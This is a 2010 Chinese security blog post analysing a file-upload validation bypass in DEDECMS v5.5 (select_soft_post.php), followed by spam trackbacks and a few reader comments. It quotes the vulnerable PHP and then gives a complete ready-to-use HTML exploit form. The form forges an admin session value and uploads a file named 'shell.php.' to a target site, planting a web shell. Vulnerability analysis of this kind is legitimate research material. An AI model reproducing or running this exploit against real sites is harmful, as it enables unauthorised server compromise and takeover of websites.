DEDECMS v5.5 Final select_soft_post.php 漏洞
This entry was posted on Mar 09 2010
作者:st0p
转载请注明出处 http://www.st0p.org
今天才从Wolves Security Team看到toby57大牛发布的"DEDECMS v5.5 GBK Final 的一个鸡肋漏洞"这篇文章,原文地址:http://bbs.wolvez.org/topic/125/
自己本地测试了一下,覆盖SESSION这个有点鸡胁才是真的,因为要求session.auto_start = 1的情况下,一般session.auto_start这个是关闭的,所以很鸡胁.不过后面的拿SHELL当你成功进入后台的情况下就能用了..
而且session.auto_start一般是要和session_start()一起用的.查了一下资料,只有在session.auto_start开启的情况下,先调用session_start(),然后才有可能.不过具体杂覆盖的SESSION我还没去看,唉,要真找下去头非晕不可...有空在看吧..
我看了一下,其实GBK和UTF8都存在这个问题,不知道发现这个的大牛为啥只是把标题写了GBK...
看了一下/include/dialog/select_soft_post.php
问题主要出现在手工指定文件名后,更名的部分.当我们的名字为st0p.php.的时候,注意,php后还有个点,就可以跳过验证,看代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | ...... //文件名(前为手工指定, 后者自动处理) if(!empty($newname)) { $filename = $newname; //当我们的新名称为st0p.php.的时候 if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name); //当$filename中不含有.的时候调用 else $fs = explode('.', $filename); //当$filename中含有.时调用 if(eregi($cfg_not_allowall, $fs[count($fs)-1])) //$fs[count($fs)-1]得到的值为空,跳过验证 { ShowMsg("你指定的文件名被系统禁止!",'javascript:;'); exit(); } if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1]; } else { $filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme)); $fs = explode('.', $uploadfile_name); if(eregi($cfg_not_allowall, $fs[count($fs)-1])) { ShowMsg("你上传了某些可能存在不安全因素的文件,系统拒绝操作!",'javascript:;'); exit(); } $filename = $filename.'.'.$fs[count($fs)-1]; } $fullfilename = $cfg_basedir.$activepath.'/'.$filename; //嘿嘿,跳过验证,$filename还为st0p.php. $fullfileurl = $activepath.'/'.$filename; move_uploaded_file($uploadfile,$fullfilename) or die("上传文件到 $fullfilename 失败!"); @unlink($uploadfile); ...... |
EXP如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DEDECMS v5.5 Final select_soft_post.php EXP</title>
<script type="text/javascript">
function fsubmit(){
var form = document.forms[0];
form.action = form.target.value + form.path.value;
tmpstr = form.target.value +'/'+ form.newname.value;
form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
form.submit();
}
</script>
<style type="text/css">
<!--
body {
text-align: center;
}
-->
</style>
</head>
<body>
<h3>DEDECMS v5.5 Final select_soft_post.php EXP</h3>
<form action="" method="post" enctype="multipart/form-data">
<p>
<input type="hidden" name="_SESSION[dede_admin_id]" value="1" />
<input type="hidden" name="bkurl" value="1" />
<label>Target:
<input name="target" type="text" id="target" value="http://target" />
</label>
<label>Path:
<input name="path" type="text" id="path" value="/include/dialog/select_soft_post.php" />
</label>
<label>File:
<input type="file" name="uploadfile" id="uploadfile" />
</label>
<label>NewName:
<input name="newname" type="text" id="newname" value="shell.php." />
</label>
<input type="submit" name="button" id="button" value="Fuck" onclick="fsubmit()" />
</p>
</form>
</body>
</html> |
72 Responses
to “DEDECMS v5.5 Final select_soft_post.php 漏洞”
70 Trackback(s)
- Nov 5, 2011: roofing Mentor KY
- Nov 6, 2011: payday loans uk
- Nov 10, 2011: improve vision
- Nov 11, 2011: wordpress design Philippines
- Nov 11, 2011: agencia digital
- Nov 12, 2011: sua de tuoi
- Nov 13, 2011: guaranteed football picks
- Nov 14, 2011: How to save my marriage
- Nov 14, 2011: atlanta carpet cleaning
- Nov 15, 2011: Duncan Hines coupon
- Nov 15, 2011: boonie hat
- Nov 15, 2011: best male enhancement
- Nov 16, 2011: How to SEO
- Nov 16, 2011: day in the life video production
- Nov 16, 2011: ecover creator
- Nov 16, 2011: moving long distance
- Nov 16, 2011: Mario games to play
- Nov 17, 2011: dining solutions direct
- Nov 18, 2011: dining solutions direct
- Nov 18, 2011: Learner Driver Insurance
- Nov 19, 2011: Car Hire Ayia Napa
- Nov 19, 2011: hyip investment
- Nov 20, 2011: Frontierville
- Nov 20, 2011: online public relations
- Nov 21, 2011: rojadirecta.es
- Nov 21, 2011: Yaz Lawsuit
- Nov 22, 2011: amazon coupons
- Nov 22, 2011: Office cleaning in York
- Nov 22, 2011: fishing casting tips
- Nov 23, 2011: online casino uk
- Nov 23, 2011: on fire matrix team build
- Nov 23, 2011: watch Greys Anatomy online
- Nov 24, 2011: Traffic Accidents
- Nov 24, 2011: accident injury claims
- Nov 24, 2011: cocaine addiction
- Nov 28, 2011: medical negligence
- Nov 29, 2011: Tampa adult store
- Nov 29, 2011: survival food and water
- Nov 30, 2011: best xbox game
- Dec 2, 2011: wordpress
- Dec 3, 2011: Sua tuoi
- Dec 4, 2011: online business
- Dec 5, 2011: sex toys
- Dec 6, 2011: video production reading pa
- Dec 7, 2011: Fine Wine
- Dec 13, 2011: water damage Kansas City
- Dec 20, 2011: Carrier Parts
- Dec 28, 2011: private krankenversicherung vergleich
- Dec 28, 2011: pkv wechsel
- Dec 28, 2011: uk lotto
- Dec 28, 2011: video production newark de
- Jan 6, 2012: bridal gowns in Glendale CA
- Jan 7, 2012: Warlock Guide
- Jan 10, 2012: my homepage
- Jan 12, 2012: injury compensation
- Jan 13, 2012: coffee
- Jan 15, 2012: wet basements Morrow OH
- Jan 17, 2012: edible creations fruit bouquets
- Jan 17, 2012: deportiva
- Jan 19, 2012: Whatman filter paper
- Jan 20, 2012: rest homes in auckland
- Jan 21, 2012: bolsas
- Jan 26, 2012: Sommerreifen
- Jan 27, 2012: Long Island, NY attorney
- Jan 29, 2012: Alpha Warranty Services
- Jan 30, 2012: free nba picks
- Feb 3, 2012: Top Penny Stocks
- Feb 3, 2012: Superbowl XLVI Betting
- Feb 4, 2012: Know more about Buy k2
- Feb 4, 2012: sportsbook reviews
You must be logged in to post a comment.
DeDe遇到你真是悲剧呵^EXP就EXP吧,还用…
多了两条鱼?-_-!
犀利~